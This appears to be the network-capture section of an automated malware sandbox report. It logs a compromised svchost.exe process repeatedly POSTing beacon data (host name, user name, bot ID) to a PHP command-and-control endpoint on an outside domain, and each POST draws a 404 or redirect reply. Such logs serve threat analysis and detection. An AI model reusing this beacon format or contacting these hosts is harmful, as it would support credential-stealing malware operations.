Feb 25, 2025 05:25:47.688956022 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:47.694139004 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:48.450730085 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=epsDzxRhKP7%2Bi1h58I2%2BiIZV8j5KxkBPaIgNa1cXeX1krojLfkeU7wDeTFer48uxgbo%2Fo5P2SFDhQQW9VRX7VZ2JK4k0L7lM8YyEXvMGavMe0uA797gDq%2B8YVvA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174eefb892f5e7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2174&min_rtt=2174&rtt_var=1087&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50030	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:49.777595043 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:49.782795906 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:50.490956068 CET	817	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:50 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4rr3ReN1YfX506T8hlf9ITGckAZm1i9TFOd5DhZJeDf3qAettlKBZ6Mk5tAOLwiv7cdOqPbAAz1ESDp2khTrHpZA9jA69qWS6PW9U3MLLWlSpSuOEt%2F9C7AsDfk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef088a121a03-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2009&rtt_var=1004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50031	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:51.679333925 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:51.686455965 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:52.471117020 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HnBNFa3tt2I8BPGaUpSKLcl43VsuieUpyIMTB4svT6W1L0IExxjelr8573vlRp2xDmB1Z%2BXPlzx46yzwiVzk4%2B1yLy531YdHPn0de%2FGOx61iVSf4260481XkKkg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef14786bc343-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50032	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:53.657907963 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:53.663006067 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:54.438973904 CET	840	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=huoxgydmMTKnOn%2BiaTZoeGxg0YnnOPwWyk4NVkxhpwvqsUm2OxHUHoTeji77ZqH68507i01ROxpBDAVR4KM%2F7uewQtA2Rw0KoWNPBZghoYrjUCJZ951gK41RzKc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef20e8107cae-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50033	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:55.590445042 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:55.595532894 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:56.310067892 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:56 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I7Xr3Fhh3QNgZZcSdVPQAzURDL%2BzyrAYcHRSE8QslNg9m2jfB05n%2BrkKXyTO3ONJF4uy5Y4y0rZ0%2Fyay55DQO3I1iEBe6MNg2xCxP2BoJX87tsETMRCauwmUrJQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef2ce9384370-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50034	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:57.472239971 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:57.477338076 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:58.267930984 CET	836	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P3VCGhnLIfP27nJ4CMuEXtbZfRF4ALdceW1DASgZEPm24gjcmQRcMW15W5LhJJfeEJ8tc6nRBescobuP4kDXGNb9QquMNTl9BsLCaa9nBiXngtzi6gqI4rHVihw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef38d91d42af-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50035	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:59.455275059 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:59.460376978 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:26:00.224647999 CET	840	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:26:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6JvDQCzzAK38FAJqLXyZAnv7eyiUxgRgc7%2FSXU11A8xEgUmewC88Ggm1XYC%2F5wG2BPBPSdlkdoPZZMa9zqPKZOttuY5XoLDPX21e9u4ytjkHWPRlyW4AdXlNjA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef451bb40f75-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1651&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50036	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:26:01.393002033 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:26:01.398189068 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:26:02.181185007 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:26:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIeXsx6ZS8Uh7IQ6FtoKTeZl8jtogQBXim4Xhe%2BNKTFRDbOlVei7Ftu9C7LGFdH%2B0dZpIWJaLAmBahMQz87EUuA%2BKdb0leqqAZ2zx1unNtKXNckUgum%2BcFk9rBQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef513aa64331-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=2001&rtt_var=1000&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50037	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:26:03.443218946 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:26:03.448369980 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:26:04.182133913 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:26:04 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lA72VDHcD%2B4NtatwVEoSwUCCeI7U30U9yE%2Bb4sKvqVsFHa7bOT8io91xwBff%2FSADdWz5AmraE154lIWdvfChc%2F11egmJ0zQRWF5HLyl01nSiiRvyjqQPbg9V9Ys%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef5e0b8980d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50038	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:26:05.366341114 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:26:05.372369051 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:26:06.007834911 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:26:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYUEx2xlh0X2rtw9%2Fp1JF81IVl0FB64Zlft7UxI78lyREDRVgLNqxlu9rWgrbq%2FY4zQ5Q4HQT4rAbsl8ShYXCvg2kOHTgXuNJETQwllOhWxWlA7%2FgWkOiy18MPI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef6a09e46a56-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50039	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:26:07.171087027 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:26:07.176187038 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:26:07.938870907 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:26:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKQ7YDal3nu1KYOoUGcY9Hy4RfVJJELEGPgS93gg4%2Bw6dOVLWrkjqgfxQs%2Bd9aXvT9DhjEtvbuGhEqptyNnXLB2wWI5m%2BftrFPJf741ENXMMj7GjWZuPg%2BtHlAU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef7548e94363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2373&min_rtt=2373&rtt_var=1186&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50040	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:26:09.112327099 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:26:09.117397070 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:26:09.847412109 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:26:09 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zybgcsmmG5uJG%2FGXFoPSqO%2FERwtBtiVukaSguuZllxrB17RjSXsw3HXnJo2Lr5myiE0rYuXVOXpRHujAr%2B18y57qYCHcYnQUKLTSbkeMvuuR9rmknIWICLDY%2BRI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef8188168cd7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50041	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:26:11.276530981 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:26:11.284388065 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:26:11.935039997 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:26:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tqLaTn0%2B030qrKNJTlWri2qkfAkoJdYWeKxl4UK53Ls2k6l14yUAuLJbvicR5zawgdSPVxQILFCYfsgY%2F%2FcGxiCaMJBvWX%2BMkGLNMS6x8ZfOxtsFnH1DCzJIKno%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef8efb68439f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1836&rtt_var=918&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.5	50042	104.21.96.1	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:26:13.080568075 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:26:13.086716890 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
